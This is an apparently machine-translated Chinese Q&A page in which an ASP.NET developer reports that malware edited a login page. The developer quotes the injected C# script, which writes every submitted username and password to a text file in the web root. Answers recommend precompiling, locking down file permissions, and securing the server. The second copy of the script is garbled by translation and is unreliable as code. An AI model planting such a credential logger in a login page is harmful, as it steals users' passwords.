C# 如何不允许编辑网页aspx？_C#_Asp.net

C# 如何不允许编辑网页aspx？

c# asp.net

C# 如何不允许编辑网页aspx？,c#,asp.net,C#,Asp.net,昨天，我的web应用程序被病毒更改，病毒编辑了登录页面。打开aspx文件时，我遇到了以下脚本： <script runat="server"> protected void btnLogin_Click(object sender, EventArgs e) { using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\Inetpub\wwwroot\...\ldaptxt2.txt", true)

昨天，我的web应用程序被病毒更改，病毒编辑了登录页面。打开aspx文件时，我遇到了以下脚本：

<script runat="server">
protected void btnLogin_Click(object sender, EventArgs e)
{
   using (System.IO.StreamWriter file = new System.IO.StreamWriter(@"C:\Inetpub\wwwroot\...\ldaptxt2.txt", true))
   {
      file.WriteLine(username.Text + "|" + password.Text);
   }
}
</script>


受保护的无效btnLogin\U单击（对象发送方，事件参数e）
{
使用（System.IO.StreamWriter file=new System.IO.StreamWriter（@“C:\Inetpub\wwwroot\…\ldaptxt2.txt”，true））
{
file.WriteLine（username.Text+“|”+password.Text）；
}
}

有人知道如何避免这种情况吗？..

最佳做法是在生产环境中预编译视图和代码隐藏文件

任何可以修改

aspx

页面的人也可以替换

bin

文件夹中的程序集。正确的做法是保护web服务器。

您可以将文件设置为只读，和/或删除除应用程序运行网站时使用的服务帐户之外的所有访问权限。执行此操作的人都可以访问您的托管服务器。确保您更改了所有密码并重新保护服务器。他问如何进行。我想他知道他必须这么做。